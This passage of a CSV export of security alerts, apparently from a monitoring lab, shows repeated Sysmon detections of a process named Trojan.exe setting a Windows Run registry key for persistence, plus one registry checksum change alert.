Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:57.142",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:53.340 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:53.341294700Z"",""eventRecordID"":""1863"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:53.340\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:53.340"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:55.736",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:52.324 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:52.329449100Z"",""eventRecordID"":""1861"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:52.324\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:52.324"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:54.954",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:51.293 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:51.294972000Z"",""eventRecordID"":""1860"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:51.293\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:51.293"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:53.751",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:50.277 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:50.281203800Z"",""eventRecordID"":""1858"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:50.277\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:50.277"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:52.678",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:49.246 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:49.251246800Z"",""eventRecordID"":""1857"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:49.246\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:49.246"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:52.220",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:48.230 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:48.231825600Z"",""eventRecordID"":""1856"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:48.230\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:48.230"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:51.564",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:47.215 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:47.227346500Z"",""eventRecordID"":""1855"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:47.215\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:47.215"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:51.518",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:46.199 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:46.201756000Z"",""eventRecordID"":""1854"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:46.199\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:46.199"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:49.177",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:45.168 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:45.170480200Z"",""eventRecordID"":""1853"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:45.168\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:45.168"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:48.376",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Capabilities' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '031a2ac02f3ad0395ebc66e870d3f7a1' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '02327737fea3871d2b8ede52654439d116f38683' +", +"May 24, 2020 @ 16:25:47.892",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:44.152 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:44.155270200Z"",""eventRecordID"":""1852"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:44.152\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:44.152"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:46.799",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:43.137 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:43.143974900Z"",""eventRecordID"":""1851"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:43.137\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:43.137"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 